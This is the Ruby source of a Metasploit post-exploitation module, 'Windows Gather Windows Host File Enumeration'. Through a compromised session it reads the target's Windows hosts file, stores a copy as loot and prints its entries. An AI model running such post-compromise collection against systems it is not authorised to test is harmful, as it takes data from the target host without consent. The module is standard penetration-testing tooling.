1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Windows Gather Windows Host File Enumeration',
14
        'Description' => %q{
15
          This module returns a list of entries in the target system's hosts file.
16
        },
17
        'License' => BSD_LICENSE,
18
        'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],
19
        'Platform' => [ 'win' ],
20
        'SessionTypes' => [ 'meterpreter', 'shell' ],
21
        'Notes' => {
22
          'Stability' => [CRASH_SAFE],
23
          'SideEffects' => [],
24
          'Reliability' => []
25
        }
26
      )
27
    )
28
  end
29

30
  def run
31
    # read in the hosts in the hosts file.
32
    hosts = read_file 'C:\\WINDOWS\\System32\\drivers\\etc\\hosts'
33

34
    # Store the original hosts file
35
    p = store_loot(
36
      'hosts.confige',
37
      'text/plain',
38
      session,
39
      hosts,
40
      'hosts_file.txt',
41
      'Windows Hosts File'
42
    )
43

44
    # Print out each line that doesn't start w/ a comment
45
    entries = []
46
    hosts.each_line do |line|
47
      next if line =~ /^[\r|\n|#]/
48

49
      entries << line.strip
50
    end
51

52
    # Show results
53
    if !entries.empty?
54
      print_line('Found entries:')
55
      entries.each do |e|
56
        print_good(e.to_s)
57
      end
58
    end
59

60
    print_status("Hosts file saved: #{p}")
61
  end
62
end
63

64